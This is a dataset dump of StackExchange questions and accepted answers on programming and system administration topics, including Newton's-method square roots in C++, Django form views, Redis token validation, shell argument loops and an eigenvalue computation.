id
stringlengths 5
27
| question
stringlengths 19
69.9k
| title
stringlengths 1
150
| tags
stringlengths 1
118
| accepted_answer
stringlengths 4
29.9k
⌀ |
---|---|---|---|---|
_codereview.43456 | I designed a program that calculates the square root of a number using Newton's method of approximation that consists of taking a guess (g) and improving it (improved_guess = (x/g + g)/2) until you can't improve it anymore:#include <iostream>#include <iomanip>using namespace std;template <class Y>Y sqrt (Y x){ double g (1), ng; while (true) { ng = (x/g + g)/2; if (g != ng) g = ng; else if (g == ng) break; } return g;}void menu(){ double x, g; string a = ; do { cout << Enter a number to get the sqrt of: ; cin >> x; g = sqrt(x); cout << The result is: << setprecision(100) << g << endl; cout << Result^2 = << setprecision(100) << g*g << endl; cout << \nDo it again ? <y/n> ; cin >> a; cout << endl; } while (a == y);}int main(){ menu(); return 0;}Can you see any way to improve this ? Like in the do it again part, I just couldn't use y/n... | Square root approximation with Newton's method | c++;mathematics | Good comments have been posted already but no one explicitly pointed out that the if (g == ng) doesnt bring anything in the function and :while (true) { double ng = (x/g + g)/2; if (g != ng) g = ng; else if (g == ng) break;}return g;can be written :while (true) { double ng = (x/g + g)/2; if (g != ng) g = ng; else break;}return g;or even better :double g (1);while (true) { double ng = (x/g + g)/2; if (g == ng) break; g = ng;}return g;which can just as easily be written :while (true) { double ng = (x/g + g)/2; if (g == ng) return g; g = ng;} |
_unix.204228 | So...ls -l --block-size=MBtells me that directory is one MBls -l --block-size=MB directorytells me there's a 3MB file inside the directory. Shouldn't that make the directory at least 3MB? How can the directory be smaller than its contents? | ls - why is parent directory smaller than its contents? How to see the size of directory's contents? | filesystems | No, because the contents of the first directory itself are only 1MB. If you want something that will sum all the sizes in the directory tree under a directory you want duls doesn't recurse into subdirectories as a normal matter of course. It just reports on the things that are directly in the location you are looking at. So in your first directory if you add up all the sizes of just the things directly in that directory it can be less than the sizes of the things in a subdirectory. But ls didn't look in that subdirectory, so doesn't know anything about them when it generates its listing for you. |
_codereview.167367 | I have a model Sachbearbeiter that has a OneToOneField to the User model in django.contrib.auth.class Sachbearbeiter(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE) ...I created a view to enable certain people to create a new Sachbearbeiter. There are three things that need to be done:When a Sachbearbeiter is created, a corresponding User must be created automatically.The Sachbearbeiter.user must point to the corresponding User automaticallly.When a User is created, the username must match the given email address.I implemented this in my view.def sachbearbeiter_create(request): user_form = UserForm(request.POST or None) sachbearbeiter_form = SachbearbeiterForm(request.POST or None) if request.method == 'POST': if user_form.is_valid() and sachbearbeiter_form.is_valid(): user = user_form.save(commit=False) user.username = user.email user.save() sachbearbeiter = sachbearbeiter_form.save(commit=False) sachbearbeiter.user = user sachbearbeiter.save() ... return render(request, 'sachbearbeiter/detail_neu.html', {'user_form': user_form, 'sachbearbeiter_form': sachbearbeiter_form})And those are the forms:class SachbearbeiterForm(ModelForm): class Meta: model = Sachbearbeiter fields = [verein, ]class UserForm(ModelForm): class Meta: model = User fields = [first_name, last_name, email] def __init__(self, *args, **kwargs): self.base_fields['first_name'].required = True self.base_fields['last_name'].required = True self.base_fields['email'].required = True super(UserForm, self).__init__(*args, **kwargs)I have two questions:I have the feeling there is a better way to create to instances and link them to each other, than what I did in the view. Are there any improvements I could do?Is the view really the right place to implement that logic? | Create Django objects on the fly. Better way to do it? And is the view the best place? | python;django | null |
_cstheory.38590 | This problem is probably known under some other name, if anyone has seen it before, a reference will be great.Given $n,m,k$ (for $m,k\ll n$), a $(n,m,k)$ separating set is a set of $n$-sized binary vectors $V$ such that for every disjoint $S,S'\subset \{1,\ldots,n\}$, $|S|=m,|S'|=k$ there exists $v\in V: v_{|S}=0, v_{|S'}=1$.That is, for every set of $m$ indices $S$ and a non-overlapping set of $k$ indices $S'$, there should be a vector whose $S$ entries are all zeros and his $S'$ entries are all ones.The goal is to construct a small set $V$ with the above properties.Is this problem known? Are there known deterministic constructions of such $V$? What is the minimal size of such $V$? What about a lower bound?It seems that it is easy to build $V$ randomly (which would yield $|V|=O(2^{m+k}(m+k)\log n)$ by choosing uniformly distributed i.i.d. vectors).The $2$ at the base of the exponent can be improved if $m\neq k$ by setting each bit with probability $k/(m+k)$.Is this an optimal construction? | How to construct an $(n,m,k)$ ``separating set''? | ds.algorithms;co.combinatorics;extremal combinatorics | null |
_webmaster.11650 | One of my sites is a single page that focuses on getting the user to call a phone number.In GA, I've set up a Goal for when visitors spend more than 1 minute on the site. I realized much later that GA doesn't trap exit events, so visitors who arrive at the site and click back won't be counted. I'd like to modify that; but that's for another question.I've got a number of users with an Average Time on Site >0 ; and a page depth > 1. I can't figure out how --- My site contains a single page. The number of users with Page Depth 2+ doesn't equal the number of returning visitors - otherwise I'd assume these are people who left and then typed in the url manually.I'm at a loss. Did they just hit refresh? Did they bookmark the site and return to it? (That shouldn't count as 'time on site' though'...) | How do I have a page depth > 1 on a single page website? | google analytics;analytics | Page depth does not take into account unique pageviews, just total pageviews. So, yes, if your end user refreshes the page in any way, it'll count as a two-page visit. If they bookmark the page and return to it a few hours later, its a new visit, and doesn't alter the previous visit's page depth. |
_codereview.10574 | I used this code on my own site and now trying to transfer it to my new site which uses codeigniter. I'm not sure how I can eliminate some of this code and still maintain its purpose and functionality with merging it into my controller, model, and library.<div id=headerCharacter> <?php if ($access_level_id == 2 || $access_level_id == 3) { $query = SELECT characters.id FROM characters; $result = mysqli_query ($dbc,$query); $total_num_characters = mysqli_num_rows($result); $query = SELECT user_characters.id FROM user_characters INNER JOIN user_accounts ON user_accounts.id = user_characters.user_id; } else { $query = SELECT user_characters.id FROM user_characters INNER JOIN user_accounts ON user_accounts.id = user_characters.user_id WHERE user_accounts.id = '.$user_id.'; } $result = mysqli_query($dbc,$query); $num_available_characters = mysqli_num_rows($result); if (($num_available_characters > 1) || (($access_level_id == 2 || $access_level_id == 3) && (isset($total_num_characters)) && ($total_num_characters > 0))) { ?> <form method=POST id=change_default_character> <select class=dropdown name=new_default_character_id id=new_default_character_id title=Select Character> <?php if ($default_character_id > 0) { print <option value=.$default_character_id.>.$default_character_name; } else { print <option value=0>- Select -; } if ($access_level_id == 2 || $access_level_id == 3) { $query = SELECT characters.id, characters.character_name FROM characters WHERE characters.id <> '.$default_character_id.' AND characters.status_id = '1' ORDER BY characters.character_name; } else { $query = SELECT characters.id, characters.character_name FROM characters INNER JOIN user_characters ON characters.id = user_characters.character_id INNER JOIN user_accounts ON user_accounts.id = user_characters.user_id WHERE user_accounts.id = '.$user_id.' AND user_characters.character_id <> '.$default_character_id.' AND characters.status_id = '1' ORDER BY characters.character_name; } $result = mysqli_query ($dbc,$query); $num_rows = mysqli_num_rows ($result); if ($num_rows > 0) { if ($access_level_id == 2 || $access_level_id == 3) { print <optgroup label=\** Active Characters **\>; } while ( $row = mysqli_fetch_array ( $result, MYSQL_ASSOC ) ) { print <option value=\.$row['id'].\>.$row['character_name'].</option>\r; } } if ($access_level_id == 2 || $access_level_id == 3) { $query = SELECT characters.id, characters.character_name FROM characters WHERE characters.id <> '.$default_character_id.' AND characters.status_id = '2' ORDER BY characters.character_name; } else { $query = SELECT characters.id, characters.character_name FROM characters LEFT JOIN user_characters ON characters.id = user_characters.character_id LEFT JOIN user_accounts ON user_accounts.id = user_characters.user_id WHERE user_accounts.id = '.$user_id.' AND user_characters.character_id <> '.$default_character_id.' AND characters.status_id = '2' ORDER BY characters.character_name; } $result = mysqli_query ($dbc,$query); $num_nows = mysqli_num_rows($result); if ($num_rows > 0) { print <optgroup label=\** Inactive Characters **\>; while ( $row = mysqli_fetch_array ( $result, MYSQL_ASSOC ) ) { print <option value=\.$row['id'].\>.$row['character_name'].</option>\r; } } ?> </select> </form> <?php } else { print <h1>.$default_character_name.</h1>\n; } ?> </div>EDIT :If user role is a user or editor then either display their default character or if more than one character then display dropdown of all handled characters. If user role is an administrator or webmaster then display their default character or ALL characters.Displays Active (status-1), Inactive(status-2), Injured(status-3, Alumni(status-4) in separate option groupsController: $this->data['userRoster'] = $this->kowauth->getRosterList($this->data['userData']->usersRolesID);Library:/** * Get roster list * * @param integer * @return object/NULL */function getRosterList($usersRolesID){if (($usersRolesID == 4) || ($usersRolesID == 5)){ return $this->ci->users->getAllRoster();} else{ return $this->ci->users->getRosterByUserID($this->ci->session->userdata('usersID'));}}Model:/*** Get roster list** @return object/NULL*/function getAllRoster(){ $this->db->select('rosterName');$this->db->from('rosterList');$this->db->order_by('rosterName');$query = $this->db->get();if ($query->num_rows() > 0) { return $query->result();}return null;}/*** Get list of roster by user ID** @return object/NULL*/function getRosterByUserID($usersID){$this->db->select('rosterName');$this->db->from('rosterList');$this->db->where('userID', $usersID);$this->db->order_by('rosterName');$query = $this->db->get();if ($query->num_rows() > 0) { return $query->result();}return null;} | Updating Old Code Into Code Igniter Use | php;codeigniter | First, you should really use prepared statements instead of stuff like user_accounts.id = '.$user_id.';: this will avoid security issues. Let's look at your actual question now.I'd advise you to go through the CodeIgniter officiel tutorial which will help you to understand how Models, Views and Controllers relate to each other. You should remember that they only exist to help you to organise your code in order to avoid a huge mess full of inline SQL queries and HTML code which can get out of control easily.This means you can start by putting your code in a controller function, and refactor iteratively to get a nice, easy to understand code after a few steps. A few rules of thumbs to know where to put your code:Conditional logic (eg. if ($access_level_id == 2 || $access_level_id == 3) in your code should stay in the controller. This what tells the application do this only in this case, and that in this other case.SQL queries should all go in the model. Your queries could go in one single method if they mean the same thing. Parameters to this method will help you differentiate the actual SQL queries.HTML code should only be produced in the view. The view should only display content, not retrieve data or use logic.To wrap it up, this means that the first code to get executed is in the controller. Depending on the user session and parameters, it could need to modify the database (eg. add a new user). It should ask the model to do this. It can also ask the model for some other unrelated data, and pass it up to the view which is going to display it. |
_unix.179188 | Load is high.This is my toptop - 04:08:52 up 15 days, 15:14, 1 user, load average: 99.09, 107.09, 117.35Tasks: 998 total, 125 running, 827 sleeping, 1 stopped, 45 zombieCpu(s): 13.4%us, 75.1%sy, 0.0%ni, 11.3%id, 0.0%wa, 0.0%hi, 0.2%si, 0.0%stMem: 65951648k total, 65390852k used, 560796k free, 5023756k buffersSwap: 4194300k total, 262684k used, 3931616k free, 39846488k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND14904 nobody 20 0 151m 50m 2508 R 15.4 0.1 11:12.89 httpd 1769 root 20 0 0 0 0 R 15.1 0.0 355:06.40 kondemand/22 1778 root 20 0 0 0 0 S 14.8 0.0 345:52.47 kondemand/31 1767 root 20 0 0 0 0 S 14.4 0.0 353:41.57 kondemand/20 1766 root 20 0 0 0 0 S 13.8 0.0 374:52.13 kondemand/1915188 newgames 20 0 0 0 0 Z 13.8 0.0 0:00.42 php <defunct> 1772 root 20 0 0 0 0 R 13.4 0.0 337:16.18 kondemand/25 1775 root 20 0 0 0 0 S 13.4 0.0 352:11.24 kondemand/2811857 mailnull 20 0 71640 1408 752 S 12.8 0.0 0:39.47 exim15180 hearsttr 20 0 179m 10m 6020 R 12.8 0.0 0:00.39 php20980 nobody 20 0 151m 50m 2084 R 12.8 0.1 12:14.03 httpd 1755 root 20 0 0 0 0 S 12.5 0.0 364:43.87 kondemand/8 1764 root 20 0 0 0 0 R 12.5 0.0 342:25.04 kondemand/1715161 hearsttr 20 0 0 0 0 Z 12.5 0.0 0:00.38 php <defunct> 1756 root 20 0 0 0 0 R 12.1 0.0 352:29.80 kondemand/9 1771 root 20 0 0 0 0 R 12.1 0.0 349:01.36 kondemand/2415138 hearsttr 20 0 0 0 0 Z 12.1 0.0 0:00.37 php <defunct> 1757 root 20 0 0 0 0 S 11.8 0.0 368:19.92 kondemand/10 1773 root 20 0 0 0 0 S 11.8 0.0 355:11.04 kondemand/2615174 newgames 20 0 0 0 0 Z 11.8 0.0 0:00.36 php <defunct>15440 nobody 20 0 151m 50m 2080 R 11.8 0.1 10:13.40 httpd 1760 root 20 0 0 0 0 R 11.5 0.0 368:08.78 kondemand/13 1765 root 20 0 0 0 0 S 11.5 0.0 358:25.81 kondemand/1815817 nobody 20 0 151m 50m 2112 R 11.5 0.1 12:15.94 httpd15194 hearsttr 20 0 187m 12m 5820 S 11.1 0.0 0:00.34 php15217 hearsttr 20 0 0 0 0 Z 10.8 0.0 0:00.33 php <defunct>15226 newgames 20 0 0 0 0 Z 10.8 0.0 0:00.33 php <defunct> 1219 nobody 20 0 151m 50m 2084 R 10.5 0.1 2:26.14 httpd 1758 root 20 0 0 0 0 S 10.5 0.0 375:39.42 kondemand/11 1759 root 20 0 0 0 0 R 10.5 0.0 364:42.21 kondemand/12 1763 root 20 0 0 0 0 S 10.5 0.0 355:34.66 kondemand/16 1770 root 20 0 0 0 0 S 10.5 0.0 350:08.17 kondemand/23 6111 nobody 20 0 151m 50m 2508 R 10.5 0.1 9:23.07 httpd14425 nobody 20 0 151m 50m 2208 S 10.5 0.1 11:37.53 httpd15085 nobody 20 0 151m 50m 2508 R 10.5 0.1 11:11.37 httpd15228 sexsmovi 20 0 188m 12m 5820 S 10.5 0.0 0:00.32 php15378 nobody 20 0 151m 50m 2508 S 10.5 0.1 11:46.37 httpd15522 nobody 20 0 151m 50m 2196 S 10.5 0.1 10:54.56 httpd16446 nobody 20 0 151m 50m 2988 S 10.5 0.1 11:12.03 httpd16962 nobody 20 0 151m 50m 2196 S 10.5 0.1 11:05.68 httpd18266 nobody 20 0 151m 50m 2084 S 10.5 0.1 11:41.40 httpd18334 nobody 20 0 151m 50m 2468 S 10.5 0.1 10:39.56 httpd18774 nobody 20 0 151m 50m 2092 S 10.5 0.1 11:00.09 httpd 817 nobody 20 0 151m 51m 2992 S 10.2 0.1 10:09.30 httpd 1882 nobody 20 0 151m 50m 2844 S 10.2 0.1 11:40.74 httpd14523 nobody 20 0 151m 50m 3000 S 10.2 0.1 11:30.28 httpd14900 nobody 20 0 151m 50m 2080 S 10.2 0.1 10:38.68 httpd14919 nobody 20 0 151m 50m 2540 S 10.2 0.1 11:33.35 httpd15178 nobody 20 0 151m 50m 2508 S 10.2 0.1 11:35.48 httpd15223 romanced 20 0 0 0 0 Z 10.2 0.0 0:00.31 php <defunct>15251 nudeteen 20 0 184m 9.9m 5204 R 10.2 0.0 0:00.31 php15259 investgr 20 0 184m 9884 5164 R 10.2 0.0 0:00.31 php15460 nobody 20 0 151m 50m 2076 S 10.2 0.1 12:09.73 httpd15944 nobody 20 0 151m 50m 2092 R 10.2 0.1 11:27.52 httpd16168 nobody 20 0 151m 50m 2508 S 10.2 0.1 11:40.34 httpd16736 nobody 20 0 151m 50m 2968 R 10.2 0.1 11:42.38 httpd17367 nobody 20 0 151m 50m 2228 S 10.2 0.1 10:32.59 httpd17438 nobody 20 0 151m 50m 2540 S 10.2 0.1 10:54.28 httpd17882 nobody 20 0 151m 50m 2980 S 10.2 0.1 11:12.86 httpdNotice that 75% of the CPU is used by system instead of users. I wonder what they do?root@host [~]# iostat -xk 5Linux 2.6.32-504.el6.x86_64 (host.buildingsuperteams.com) 01/14/2015 _x86_64_ (32 CPU)avg-cpu: %user %nice %system %iowait %steal %idle 6.75 0.03 13.14 0.02 0.00 80.06Device: rrqm/s wrqm/s r/s w/s rkB/s wkB/s avgrq-sz avgqu-sz await svctm %utilsda 0.27 132.84 1.38 37.44 17.17 1371.08 71.52 0.42 10.77 0.69 2.67sdb 0.05 38.16 0.51 29.32 12.26 273.27 19.14 0.19 6.32 0.32 0.94iostat doesn't show any excessive usage of the ssdrunning iftop doesn't seem show the net to be the bottle neck.Something is running on system but what?On my other server some suggestYour server has a high load because of how you have Apache configured, as each new php access opens a new process.I enable Apache keepalive for this vhost and it seems to be a lowering the load.I wonder where I can learn more about it.Here is some info on the 16 core cpuroot@host [~]# grep -E '^model name|^cpu MHz' /proc/cpuinfomodel name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 1400.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000 | My load is high. Top is strange. IOStats show low load | load | null |
_scicomp.10718 | Suppose I have a symmetric matrix $A_{1000\times 1000}$, which can be represented by:$A = J G J^T$where $J$ in 1000x3 is full column rank dense matrix; $G$ in 3x3 is a nonsingular dense matrix.What is the fastest way to obtain ONLY the maximum eigenvalue of $A$?I know that the eigenvalue problem of symmetric matrix can be faster than that of general dense matrix, but can the following features of the problem make it even faster ?only the maximum eigenvalue of $A$ is needed;$A = J G J^T$, rank($A$) = 3, and $A$ has only 3 nonzero eigenvaluesCan $LDL^T$ decomposition work any good? I would prefer to implement it via Eigen C++.Does $B=J^TJG$ has the same nonzero eigenvalues as $A$? | What is the most efficient way to obtain the max eigenvalue of a specific symmetric matrix via Eigen C++ | c++;matrix;eigenvalues;eigen;symmetry | We have the matrix $A$ that can be expressed as$A = JGJ^T$.The first thing is to calculate the QR decomposition of matrix $J$. Because of the low rank of the matrix it can be done very fast with, for instance, modified Gram Schmidt algorithm. Now we can write $A$ as$A = QR G R^TQ^T$,where $Q$ is an orthonormal matrix ($Q^T Q = I$). We define $F$ as follows$F = R G R^T$,where $F$ is a $3\times3$ matrix. here the eigenvalues of $F$ will be the same than the ones of your original matrix $A$. But you probably want to calculate also the eigenvectors of $A$, so we continue.Calculate the eigen decomposition of $F$:$F = XDX^T$,where $D$ is a diagonal matrix, and $X$ is orthonormal ($X^T X = I$). Then, inserting that expression for $F$ in the formula for $A$ we obtain$A = QXDX^TQ^T$,that can be rewritten as$A = YDY^T$,.So $Y = QX$ is a orthonormal matrix whose columns are the eigenvectors of $A$, and $D$ is the diagonal matrix with the eigenvalues of $A$. It is unique except for the ordering of the columns of $Y$ and $D$. |
_codereview.111760 | I come from a PHP object oriented framework background (Laravel, Symfony, Silex...). With that, validation comes in pre-built classes mechanism in a framework that validates for you parameters that you define and validates against. If it fails validation, you don't proceed.Example from Laravel: public function store(Request $request) { $validator = Validator::make($request->all(), [ 'title' => 'required|unique:posts|max:255', 'body' => 'required', ]); if ($validator->fails()) { return redirect('post/create') ->withErrors($validator) ->withInput(); } // Store the blog post... }Here, we define that it is required, max 255 for title. It is easy to read.Symfony is a bit more elaborate but still easy to read due to easily predefined class:public static function loadValidatorMetadata(ClassMetadata $metadata){ $metadata->addPropertyConstraint('firstName', new Assert\NotBlank()); $metadata->addPropertyConstraint( 'firstName', new Assert\Length(array(min => 3)) );}I'm starting to dive into node.js with express.js as base to create an API (I'm aware that Restify and Loopback exist). Currently I have one end point, which I would like to validate a hash token to identify the client, and then inspect that the stored key/value pair matches. The storage is from redis, the following is the code:/** * Check if the hash is in redis * @function CheckParam * @param {object} req - json object with the data that will be inserted in queries * @param cb - callback * @callback {object} status code */http.checkParam = function CheckParam(req, cb) { if (typeof req.body.data !== 'undefined' && req.body.data && typeof req.query.hash !== 'undefined' && req.query.hash && typeof req.body.id !== 'undefined' && req.body.id) { if (typeof req.body.data !== 'object' && typeof req.query.hash !== 'string' && typeof req.body.id !== 'number') { log.error({part: 'save'}, 'Wrong parameters type'); cb(403); } else { redis.get(req.query.hash, function (err, data) { if (err) { log.error({part: 'save'}, 'Error from redis \n ' + err); cb(403); } else if (!data) { log.error({part: 'save'}, 'Token not found \n ' + req.query.hash); cb(403); } else { try { var obj = JSON.parse(data); if (obj.member.id == req.body.id) { cb(200); } else { log.error({part: 'save'}, 'Wrong user id ' + req.body.id); cb(403); } } catch (e) { log.error({part: 'save'}, 'Error from redis \n ' + e); cb(403); } } }); } } else { log.error({part: 'save'}, 'Connection refused'); cb(403); }};Is there a more elegant way to validate parameters received from client similar to the above syntax from PHP but in node.js. I reverted to basic if && in order to check 2 simple parameter, but as you can see, it is extensive. | API to verify whether a Redis entry exists | javascript;beginner;node.js;express.js;redis | null |
_webmaster.103330 | My client is using godaddy to host a php site, and has recently signed up for google apps account for email, hoping it will help stop his automated emails from getting rejected as spam. The code sends emails using the phpmailer class. What changes do I need to make so that the email will be sent out through google instead of through godaddy? Is it a code change? Or do I need to set up mx records somewhere? How can I tell which server is actually sending the email | how can i send email in php through google apps | php;email;godaddy;google apps | MX Record will not automatically send email from your server. You need to make some CODE change. Check this answer if you want to do it with PHPMailer.$mail = new PHPMailer;// Tell PHPMailer to use SMTP$mail->isSMTP();// Enable SMTP debugging// 0 = off (for production use)// 1 = client messages// 2 = client and server messages$mail->SMTPDebug = 2;// Ask for HTML-friendly debug output$mail->Debugoutput = 'html';// Set the hostname of the mail server$mail->Host = 'smtp.gmail.com';// use// $mail->Host = gethostbyname('smtp.gmail.com');// if your network does not support SMTP over IPv6// Set the SMTP port number - 587 for authenticated TLS, a.k.a. RFC4409 SMTP submission$mail->Port = 587;// Set the encryption system to use - ssl (deprecated) or tls$mail->SMTPSecure = 'tls';// Whether to use SMTP authentication$mail->SMTPAuth = true;// Username to use for SMTP authentication - use full email address for gmail$mail->Username = [email protected];// Password to use for SMTP authentication$mail->Password = yourpassword;However, that solution has some problems of its own. The best way is to properly setup your mail server using DKIM and other settings, so that your emails don't go to spam. |
_cstheory.32202 | The Borsuk-Ulam theorem says that for every continuous odd function $g$ from an n-sphere into Euclidean n-space, there is a point $x_0$ such that $g(x_0)=0$. Simmons and Su (2002) describe a method to approximate the point $x_0$ using Tucker's lemma. However, it is not clear what the run-time complexity of their method is.Suppose we are given an oracle for the function $g$ and an approximation factor $\epsilon>0$. What is the run-time complexity (as a function of $n$) of:Finding a point $x$ such $|g(x)|<\epsilon$?Finding a point $x$ such that the $|x-x_0|<\epsilon$, when $x_0$ is a point satisfying $g(x_0)=0$? | The complexity of finding a Borsuk-Ulam point | approximation algorithms;time complexity;topology;algebraic topology | Papadimitriou showed that a version of this problem is PPAD-complete in the paper introducing that class, On the complexity of the parity argument and other inefficient proofs of existence.His formulation of the problem is:Borsuk-Ulam. Given an integer n and a Turing machine computing for each point $P=(x_1,\dots,x_d)$ with $-n\leq x_i\leq n$ and $\max_{|x_i|}=n$ (the surface of the $L_1$ sphere), a function $f(p)$ with $f(p) \leq \frac{1}{Kn}$. Find an $x$ with $|f(x) - f( - x)| \leq \frac{1}{n^2}$.(Sidenote -- many times when you see a fixed-point type of theorem, PPAD is a good guess for the complexity of finding it...) |
_unix.175971 | I'm testing GNOME 3.14 on Wayland on ArchLinux and I would also like to test GTK+ on Wayland.To do so, I can set the following two env variables from terminalexport GDK_BACKEND=wayland CLUTTER_BACKEND=waylandanf then run my app (i.e. nautilus) from terminal too.However I would like to set this session-wide so that I don't have to launch my apps from terminal.I think I cannot set them on .bashrc because they will break my standard GNOME on X session.So where is the proper place to set those variables for GNOME on Wayland session ONLY? | Setting environment variables for Gnome on Wayland session only | bash;gnome;gtk;wayland | I have found a way to do this.Create (if necessary) a ~/.profile file and add the following:WAY=$(ps -aux | head -n -1 | grep /usr/bin/gnome-shell --wayland)if [ -z $WAY ]; then echo X11else export GDK_BACKEND=wayland export CLUTTER_BACKEND=waylandfiLogout and then login in your favorite session (either X or Wayland).By using looking glass you can check if your application is actually running on Wayland. See this. |
_unix.346913 | I'm writing some iptables scripts, and I want to write a function that takes an arbitrary number of parameters and consumes them two at a time. Here's an example:#!/bin/sh# Allow inbound sessions for a specific serviceiptables --append INPUT --protocol $PROTO --destination-port $PORT \ --match state --state NEW --jump ACCEPT || exit 1I found this thread that shows the right syntax for looping through an arbitrary number of arguments, but I don't know how to grab two arguments in each iteration. How do I get both $PROTO and $PORT from the caller (from $@, two args at a time)? | Shell function that consumes two arguments per loop iteration | shell;arguments | You could do:#! /bin/sh -while [ $# -ge 2 ]; do proto=$1 port=$2 shift 2 iptables --append INPUT --protocol $proto --destination-port $port \ --match state --state NEW --jump ACCEPT || exit 1doneWith zsh:#! /bin/zsh -for proto port do iptables --append INPUT --protocol $proto --destination-port $port \ --match state --state NEW --jump ACCEPT || exit 1doneOne difference is that if there's an odd number of argument, there will be an extra run with $proto containing the last argument and $port being set but empty (as if we had used [ $# -gt 0 ] instead of [ $# -ge 2 ] in the previous example). |
_softwareengineering.191045 | Over the course of some months I've created a little framework for game development that I currently include in all of my projects. The framework depends on SFML, LUA, JSONcpp, and other libraries. It deals with audio, graphics, networking, threading; it has some useful file system utilities and LUA wrapping capabilities. Also, it has many useful random utility methods, such as string parsing helpers and math utils.Most of my projects use all of these features, but not all of them:I have an automatic updater that only makes use of the file system and networking featuresI have a game with no networking capabilitiesI have a project that doesn't need JSONcppI have a project that only needs those string/math utilsThis means that I have to include the SFML/LUA/JSON shared libraries in every project, even if they aren't used. The projects (uncompressed) have a minimum of 10MB in size this way, most of which is unused.The alternative would be splitting the framework in many smaller libraries, which I think would be much more effective and elegant, but would also have the cost of having to maintain more DLL files and projects.I would have to split my framework in a lot of smaller libraries: GraphicsThreadingNetworkingFile systemSmaller utilsJSONcpp utilsLUA utilsIs this the best solution? | Few big libraries or many small libraries? | libraries;game development;workflows;dependencies;utilities | I'd personally go for many small libraries.Discourages developers from creating dependencies between otherwise unrelated packages.Smaller more manageable libraries that are much more focused.Easier to break up and have separate teams manage each library.Once you have a new requirement that's sufficiently complex, its better to add a new module rather than find an existing library to shove the new code in. Small libraries encouragethis pattern. |
_softwareengineering.184705 | I'll preface this question by saying that I am very new to professional software dev.I work on a team that takes data in from other groups in my company and turns this data into reports usable by business execs. In the process of transferring and parsing data we have some SQL statements that do a lot of processing of the data. Nearly every SELECT uses TRIM, SUBSTR, CAST etc extensively to reduce fields to the proper size and format. Additionally there are a lot of special cases that are accounted for by using CASE statements within SELECT's. The Teradata server software that we use emits remarkably cryptic error messages. As a result we do a lot of guesswork about what data is breaking which SQL statement.My question is: would it be a good idea to reduce these somewhat complex SQL statements to a less complex form that omits the processing and special case handling, and instead do this work in an external script or program? Does this make any sense? | Good idea to move logic out of SQL statements? | sql;complexity | A big advantage of moving the processing code out of your SQL is that your SQL becomes much simpler to manage.A disadvantage is that if you ever want to use those queries in some other program, you now have to make your result-processing processes available to the other program. It could be as simple as copying a library file that contains the necessary classes, but it still means that any changes to the library have to propagated and all clients rebuilt with the new library.Another option: Why not use a view (or multiple views if you need differently formatted results for different clients) to contain most of the formatting code? That way you can get the raw query results, or the nicely formatted one, depending on what you need. |
_unix.50180 | I have installed vnuml and bridge-utils on my machine, but am unable to run the brctl command on the xterm terminals that popup after building the simulation. I get a 'command not found' error. I am, however, able to run the brctl command on my host machine's terminal, so the package is there, only the virtual nodes created are not able to access it.What needs to be done to make the 'brctl' command available to each of the UML terminals? | VNUML - 'brctl' command doesn't work in xterms | xterm | null |
_unix.358768 | I am sshing to a system and rebooting it in a while loop, however the ssh session does not close so the the script is just hanging after the first reboot. I have tried various ways to close it, any idea? I never get to the echo test.#!/bin/bashwhile truedoecho Executing SSH session to 192.168.1.1...sshpass -p pass ssh -o StrictHostKeyChecking=no [email protected] << ! ./reset.sh ! echo testsleep 20donereset.sh#! /bin/shif [ -e /dev/ttyUSB2 ] && [ -e /dev/ttyUSB5 ]; then {reboot -f}fi | ssh session not closing in bash script | bash;ssh | What can be happing is the remote session being lost as you are asking for a reboot, and so the system will hang some time waiting for the remote system to answer.I would introduce before that sshpass a timeout command, like timeout or timelimit as in:timeout 10s sshpass ...As for ssh services, try to avoid using passwords, and instead use RSA certificate authentication. Not sure about that particular sshpass command, but often, if the binary being called does not takes precautions, the password can be seen with ps when used in the command line. |
_unix.146848 | The information below seems misleading. I am confused with the example they give that if you lose dpkg (the program that lets you handle .deb files) you can use the other commands ar, tar, and gzip commands to download the .deb file for dpkg itself?If this is true, what is so special about dpkg that is not available with the other commands?As a Debian system administrator, you will routinely handle .deb packages, since they contain consistent functional units (applications, documentation, etc.), whose installation and maintenance they facilitate. It is therefore a good idea to know what they are and how to use them. This chapter describes the structure and contents of binary and source packages. The former are .deb files, directly usable by dpkg, while the latter contain the source code, as well as instructions for building binary packages. From: http://debian-handbook.info/browse/wheezy/packaging-system.html5.1. Structure of a Binary Package The Debian package format is designed so that its content may be extracted on any Unix system that has the classic commands ar, tar, and gzip (sometimes xz or bzip2). This seemingly trivial property is important for portability and disaster recovery. 